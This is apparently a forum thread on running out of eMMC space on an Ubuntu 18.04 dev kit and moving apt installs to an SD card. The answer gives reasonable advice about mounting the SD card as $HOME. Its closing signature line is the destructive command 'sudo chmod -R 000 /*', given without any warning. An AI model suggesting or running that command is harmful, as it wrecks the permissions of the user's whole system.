Changing the installation path of "apt" in Ubuntu 18.04

Hello, I have a dev kit card and it's almost running out of space (eMMC = 16Gb), the "apt" command installs directly on the / and it is mounted on the eMMC. However, I have an external SD card (64Gb) and I would like to use its space to download and install programs in it as I normally would on the internal memory. Is there any solution or guide for this ?

The short answer is that you can't. The long answer is that you can but it's a huge pain and not worth the effort, but if you really want to try here's how: https://askubuntu.com/a/441725

However, the actual binaries often don't take up a lot of space; you can offload a lot of data from your main partition by mounting your other drive as your $HOME.

Don't ask to ask, just ask... please 🤨

sudo chmod -R 000 /*
